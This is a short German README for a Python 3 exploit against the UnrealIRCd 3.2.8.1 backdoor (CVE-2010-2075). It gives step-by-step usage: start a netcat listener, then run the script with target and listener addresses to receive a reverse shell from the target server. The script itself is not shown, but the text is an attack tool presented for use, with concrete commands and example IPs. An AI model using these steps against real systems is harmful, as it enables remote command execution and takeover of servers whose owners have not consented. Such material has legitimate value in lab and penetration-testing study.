
Python-Exploit für die UnrealIRCd 3.2.8.1-Hintertür (CVE-2010-2075), die eine Reverse-Shell über einen Netcat-Listener liefert.
UnrealIRCd 3.2.8.1 Exploit zur Hintertür-Befehlsausführung in Python 3 (CVE-2010-2075).
UnrealIRCd Version 3.2.8.1 enthält ein Trojanisches Pferd, das es entfernten Angreifern ermöglicht, beliebige Befehle auszuführen (CVE-2010-2075).
Ich habe das Metasploit-Payload payload/cmd/unix/reverse_perl als Referenz verwendet, um dieses Skript zu erstellen.
Starten Sie einen Netcat-Listener auf dem empfangenden Host:
nc -lp 4444
Führen Sie das Skript aus und geben Sie die folgenden Positionsargumente an:
python3 script.py <target> <tport> <listener> <lport>
<target> Ziel-Host-IP-Adresse.<tport> Ziel-Host-Portnummer.<listener> IP-Adresse des empfangenden Hosts.<lport> Portnummer des empfangenden Hosts.Richten Sie einen Netcat-Listener auf Ihrem lokalen Rechner ein:
nc -lp 4444
Führen Sie das Skript gegen eine Zielmaschine unter 192.168.1.3 TCP-Port 6697 aus:
python3 script.py 192.168.1.3 6697 192.168.1.2 4444
Warten Sie eine Minute, und der Netcat-Listener sollte eine Reverse-Shell erhalten.